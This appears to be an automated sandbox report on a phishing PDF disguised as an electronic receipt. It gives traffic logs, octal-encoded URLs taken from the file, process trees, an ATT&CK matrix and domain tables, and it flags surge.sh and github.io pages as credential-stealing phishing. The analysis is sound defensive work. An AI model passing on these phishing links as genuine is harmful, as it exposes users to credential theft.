            Source: unknownNetwork traffic detected: HTTP traffic on port 50527 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50193 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50259
            Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50424 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50252
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50494
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50251
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50493
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50254
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50496
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50253
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50495
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50256
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50498
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50255
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50497
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50258
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50257
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50499
            Source: unknownNetwork traffic detected: HTTP traffic on port 50456 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50261
            Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50215 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50230 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50387 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50574 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50263
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50021
            Source: unknownNetwork traffic detected: HTTP traffic on port 50318 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50262
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50023
            Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50267
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50269
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50268
            Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50021 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50138 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50468 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50039
            Source: unknownNetwork traffic detected: HTTP traffic on port 50298 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50274
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50273
            Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50276
            Source: unknownNetwork traffic detected: HTTP traffic on port 50596 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50275
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50033
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50278
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50277
            Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50540 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50283
            Source: unknownNetwork traffic detected: HTTP traffic on port 50412 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50282
            Source: unknownNetwork traffic detected: HTTP traffic on port 50104 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50605 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50203 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50276 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50446 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50033 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50171 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50284
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50287
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50286
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50289
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50046
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50288
            Source: unknownNetwork traffic detected: HTTP traffic on port 50375 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50539 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50290
            Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50292
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50291
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50294
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50293
            Source: unknownNetwork traffic detected: HTTP traffic on port 50562 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50126 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50491 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50552 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50168 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50122 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50414 -> 443
            Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.7:49712 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.7:49715 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.7:49720 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.7:49761 version: TLS 1.2
            Source: classification engineClassification label: mal64.phis.winPDF@55/1263@87/36
            Source: Electronic Receipt for Carolann Campbell.pdfInitial sample: \040\150\164\164\160\163\072\057\057\167\167\167\056\144\157\143\165\163\151\147\156\056\143\157\155\057\040\000
            Source: Electronic Receipt for Carolann Campbell.pdfInitial sample: \040\150\164\164\160\163\072\057\057\167\167\167\056\144\157\143\165\163\151\147\156\056\143\157\155\057\146\145\141\164\165\162\145\163\055\141\156\144\055\142\145\156\145\146\151\164\163\057\155\157\142\151\154\145\040\000
            Source: Electronic Receipt for Carolann Campbell.pdfInitial sample: \040\150\164\164\160\163\072\057\057\145\161\165\141\142\154\145\055\164\157\157\164\150\160\141\163\164\145\056\163\165\162\147\145\056\163\150\057\063\160\067\061\117\123\165\107\147\103\157\153\066\106\117\067\132\106\125\150\105\142\142\062\147\113\071\132\170\165\131\132\170\144\154\062\171\070\110\123\146\126\163\060\105\130\067\063\113\101\061\110\147\114\147\112\062\067\110\132\150\131\131\126\122\166\171\130\146\060\167\144\101\104\122\144\112\122\130\102\065\060\141\122\125\125\122\170\071\110\155\063\060\125\062\167\060\146\124\125\105\123\113\067\110\144\142\130\115\113\151\172\061\114\162\071\161\142\170\115\107\127\111\141\142\063\110\066\150\062\061\124\141\067\141\157\126\122\125\101\157\060\114\151\104\162\146\166\125\121\163\121\115\065\121\166\120\167\142\131\106\146\171\165\115\155\066\064\141\165\123\141\141\127\114\153\164\165\112\164\101\131\164\143\111\065\117\067\105\071\065\171\060\163\163\040\000
            Source: Electronic Receipt for Carolann Campbell.pdfInitial sample: \040\150\164\164\160\163\072\057\057\163\165\160\160\157\162\164\056\144\157\143\165\163\151\147\156\056\143\157\155\057\141\162\164\151\143\154\145\163\057\110\157\167\055\144\157\055\111\055\163\151\147\156\055\141\055\104\157\143\165\123\151\147\156\055\144\157\143\165\155\145\156\164\055\102\141\163\151\143\055\123\151\147\156\151\156\147\040\000
            Source: Electronic Receipt for Carolann Campbell.pdfInitial sample: \040\150\164\164\160\163\072\057\057\167\167\167\056\144\157\143\165\163\151\147\156\056\143\157\155\057\163\165\160\160\157\162\164\040\000
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journalJump to behavior
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeFile created: C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2024-09-27 10-40-24-251.logJump to behavior
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
            Source: unknownProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\Electronic Receipt for Carolann Campbell.pdf"
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2088 --field-trial-handle=1704,i,521793384372817421,16056266662366640805,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
            Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "https://equable-toothpaste.surge.sh/3p71OSuGgCok6FO7ZFUhEbb2gK9ZxuYZxdl2y8HSfVs0EX73KA1HgLgJ27HZhYYVRvyXf0wdADRdJRXB50aRUURx9Hm30U2w0fTUESK7HdbXMKiz1Lr9qbxMGWIab3H6h21Ta7aoVRUAo0LiDrfvUQsQM5QvPwbYFfyuMm64auSaaWLktuJtAYtcI5O7E95y0ss
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2420 --field-trial-handle=2368,i,14601715867905608088,3878911157350375743,262144 /prefetch:8
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215Jump to behavior
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2088 --field-trial-handle=1704,i,521793384372817421,16056266662366640805,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8Jump to behavior
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2420 --field-trial-handle=2368,i,14601715867905608088,3878911157350375743,262144 /prefetch:8Jump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: Binary string: h);if(b)return U.yield(_.Yt(a.getRoot().el(),{Ve:l,KK:!0,eA:new _.Nt("homeport_promo_banner",{priority:"x"})}),5);if(e===String(Number(2))&&f){if(g!==Number(0)){U.Fb(5);break}m=a.getRoot().el();q=_.pDb((p=m.id)!=null?p:"");A=(z=(u=q)==null?void 0:u.ck)!=null?z:"middleslothpp";return U.yield(_.Yt(a.getRoot().el(),{Ve:l,KK:!0,eA:new _.Nt(A,{priority:"x"})}),5)}return U.yield(_.Yt(a.getRoot().el(),{Ve:l,KK:!0}),5);case 5:_.bR(a.oa,"hpbarr");a.Va("Nll0ne").isEmpty()||_.jf(a.w2a.document,_.WRD);_.vg(U, source: chromecache_1068.12.dr
            Source: Binary string: _.nDb=_.J("VOy8xe");_.oDb=_.J("s2IYHc");_.pDb=_.J("ucVTnf");_.qDb=_.J("pU3PWb"); source: chromecache_947.12.dr
            Source: Binary string: _.KDb=function(){var a=_.Jv;if(a.ka!==null)return a.ka;if(document.body){var b=_.Ql.N7(document.body).top;return a.ka=b}return 0};_.Jv=new _.Iv;_.Kv=function(a){_.Jv.WZa(a)};_.LDb=function(){return _.Jv.getScrollTop()};_.Lv=function(a,b){_.Jv.fixedUiScrollTo(a,b)};NDb=navigator.userAgent.match(/ GSA\/([.\d]+)/);MDb=NDb?NDb[1]:"";_.ODb=_.Vb&&_.pa(MDb,"4")>=0;_.PDb=_.Vb&&_.pa(MDb,"5.2")>=0;_.QDb=_.Vb&&_.pa(MDb,"4.3")>=0&&!(_.pa(MDb,"4.5")>=0); source: chromecache_947.12.dr
            Source: Binary string: _.pDb=function(a){var b;return(b=mDb)==null?void 0:b[a]};sDb=function(){qDb(rDb)};tDb=function(a){a.md!=null&&VCb(a.md,a.astyp);if(a.cb!=null){var b=!1,c=function(){b||(b=!0,a.cb())};(0,_.Bn)(c,400);(0,_.Bn)(function(){google.caft(c)},50)}};uDb=function(a){if(a.md)VCb(a.md,a.astyp);else if(a.dr){var b=!1,c=function(){b||(b=!0,a.dr())};(0,_.Bn)(c,400);(0,_.Bn)(function(){google.caft(c)},50)}};vDb=function(a){_.CUa?(0,google.jd.ms)():a.counter++}; source: chromecache_1068.12.dr
            Source: Electronic Receipt for Carolann Campbell.pdfInitial sample: PDF keyword /JS count = 0
            Source: Electronic Receipt for Carolann Campbell.pdfInitial sample: PDF keyword /JavaScript count = 0
            Source: Electronic Receipt for Carolann Campbell.pdfInitial sample: PDF keyword /EmbeddedFile count = 0
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure1
            Spearphishing Link
            Windows Management InstrumentationPath Interception1
            Process Injection
            1
            Masquerading
            OS Credential Dumping1
            System Information Discovery
            Remote ServicesData from Local System1
            Encrypted Channel
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
            Process Injection
            LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
            Non-Application Layer Protocol
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
            Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
            Ingress Tool Transfer
            Traffic DuplicationData Destruction
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            https://sharedfiles2.github.io/feel1/100%SlashNextCredential Stealing type: Phishing & Social Engineering
            https://ampcid.google.com/v1/publisher:getClientId0%URL Reputationsafe
            https://lh3.googleusercontent.com/GhfIwA6ZINFkFgE77BVZ596ZtFXFc72Z6OfHGeHh4VO8ZSNBZkXXcRdgWvhzJKDzmy22DROUcJKCaZbeDHpT7raQ-ZKBmj1MM1JqGQ=rw-e365-w28800%URL Reputationsafe
            https://apis.google.com/js/api.js0%URL Reputationsafe
            https://developers.google.com/youtube/iframe_api_reference#Events0%URL Reputationsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            google.com
            142.250.186.174
            truefalse
              unknown
              csp.withgoogle.com
              216.58.206.49
              truefalse
                unknown
                plus.l.google.com
                142.250.185.238
                truefalse
                  unknown
                  mail.google.com
                  142.250.185.133
                  truefalse
                    unknown
                    smallbusiness.withgoogle.com
                    142.250.186.177
                    truefalse
                      unknown
                      googletagmanager.com
                      142.250.186.104
                      truefalse
                        unknown
                        sharedfiles2.github.io
                        185.199.110.153
                        truefalse
                          unknown
                          appspot.l.google.com
                          142.250.186.113
                          truefalse
                            unknown
                            equable-toothpaste.surge.sh
                            188.166.132.94
                            truefalse
                              unknown
                              about.google
                              216.239.32.29
                              truefalse
                                unknown
                                youtube-ui.l.google.com
                                142.250.184.238
                                truefalse
                                  unknown
                                  tasty-library.surge.sh
                                  138.197.235.123
                                  truefalse
                                    unknown
                                    www3.l.google.com
                                    142.250.184.238
                                    truefalse
                                      unknown
                                      play.google.com
                                      142.250.185.142
                                      truefalse
                                        unknown
                                        recovertogether.withgoogle.com
                                        142.250.185.241
                                        truefalse
                                          unknown
                                          dualstack.twimg.twitter.map.fastly.net
                                          199.232.188.159
                                          truefalse
                                            unknown
                                            sustainability.google
                                            216.239.36.21
                                            truefalse
                                              unknown
                                              ghs-svc-https-sni.ghs-ssl.googlehosted.com
                                              216.58.206.83
                                              truefalse
                                                unknown
                                                www.google.com
                                                142.250.181.228
                                                truefalse
                                                  unknown
                                                  artzoya.com
                                                  88.135.68.23
                                                  truefalse
                                                    unknown
                                                    blog.google
                                                    216.239.38.21
                                                    truefalse
                                                      unknown
                                                      googlehosted.l.googleusercontent.com
                                                      142.250.184.225
                                                      truefalse
                                                        unknown
                                                        www.blog.google
                                                        unknown
                                                        unknownfalse
                                                          unknown
                                                          pbs.twimg.com
                                                          unknown
                                                          unknownfalse
                                                            unknown
                                                            ogs.google.com
                                                            unknown
                                                            unknownfalse
                                                              unknown
                                                              lh3.googleusercontent.com
                                                              unknown
                                                              unknownfalse
                                                                unknown
                                                                survey.g.doubleclick.net
                                                                unknown
                                                                unknownfalse
                                                                  unknown
                                                                  www.youtube.com
                                                                  unknown
                                                                  unknownfalse
                                                                    unknown
                                                                    apis.google.com
                                                                    unknown
                                                                    unknownfalse
                                                                      unknown
                                                                      NameMaliciousAntivirus DetectionReputation
                                                                      https://www.google.com/url?q=https://recovertogether.withgoogle.com/%3Futm_source%3DHPP%26utm_medium%3Dreferral%26utm_campaign%3Drecovertogether&source=hpp&id=19043977&ct=3&usg=AOvVaw3Ul98WUHTNkBRDd9asP537&sa=X&ved=0ahUKEwiPz-fGreOIAxUsSfEDHZ8eAfMQ8IcBCBcfalse
                                                                        unknown
                                                                        https://lh3.googleusercontent.com/2noIz2X2ov5fXwxhW8AbSDnLpp8tT3mI3-iV_OQ2UOwX_EhIBBgip7FPRs10DYmPKinVM98Qkjr1uN3BhQ3StGXCp1-O_wPwoLZeDQ=rw-e365-w2880false
                                                                          unknown
                                                                          https://www.google.com/gen_204?s=imghp&t=cap&atyp=csi&ei=ZsT2ZqHlKMKoxc8Pxv2gkAQ&rt=wsrt.1003,cbs.98,cbt.1008,hst.46&opi=89978449&ts=194022false
                                                                            unknown
                                                                            https://lh3.googleusercontent.com/dMQ1Q4xlLrl3-KsZvX_9v56emij4OkRxzapLM7RSuZVd7PgqfjPxKR4KY8hVHYXqP2ZkS-_ZueXb9ywW66H2oCyTglApr1ELCy3woOAviTgFP6uyAd0=h120false
                                                                              unknown
                                                                              https://lh3.googleusercontent.com/RIuSgyC1CZvycdCvOhK6kyGWtKZwR6gN88CimyIAdew4WMYXisZeD2x5A3fOi3GETtFbnKgxw7hb_2_ERw1-ygGSCExAsemrYx79J0hRsa4SZzzxz3A?=w1440false
                                                                                unknown
                                                                                https://lh3.googleusercontent.com/NksFVpnLFiAE4YKEh9n84ebvfznogwh0AyAUDpmpLqpBP7h791LS9RcIzWpE8XfsiR0NJiHomxV8FyVO2ccMF2VzB_L3omeUWuHu9d3LGJ4Ww6JKvievfalse
                                                                                  unknown
                                                                                  https://sharedfiles2.github.io/feel1false
                                                                                    unknown
                                                                                    https://lh3.googleusercontent.com/4-toCoht-pqFO58Z4u-TFBsGfwuNOORZURXtLloPAEw_87kPa7TKHqFmm3Z7mMO_hi5QWrjpBGqtY9zgr06lOsx3KVezooiNyD8bzJwIHK2UC1bE-RE=h120false
                                                                                      unknown
                                                                                      https://www.google.com/search/howsearchworks/assets/hIvGK13F.min.jsfalse
                                                                                        unknown
                                                                                        https://google.com/search/howsearchworks/?fg=1false
                                                                                          unknown
                                                                                          https://lh3.googleusercontent.com/G723MydBoHRVwUpO7w9sZe6TfYCUenXv_B1mP4YhY4JYdKbpzRhdbobPFlJ60If-jIEYt6wxrdS99O1FZ19NaZMinIzE_-yKKpvV96ftdmcGW3WsWfc=-h255-e365-rwufalse
                                                                                            unknown
                                                                                            https://www.google.com/search/howsearchworks/assets/bAPu5B1A.min.jsfalse
                                                                                              unknown
                                                                                              https://www.google.com/search/howsearchworks/assets/J8wBfiw3.min.jsfalse
                                                                                                unknown
                                                                                                https://sustainability.google/static/index.min.js?cache=47ade0ffalse
                                                                                                  unknown
                                                                                                  https://lh3.googleusercontent.com/wtw1KX4QKxdb9HbcQHRw4WsP88O76isYP8JmYFcVpXjHy0tckXFnms1Hgm8jbw8cY53Mx7b-x28HuQkP3nszcom9PGbKiLK1EKkSiqmb=w2000false
                                                                                                    unknown
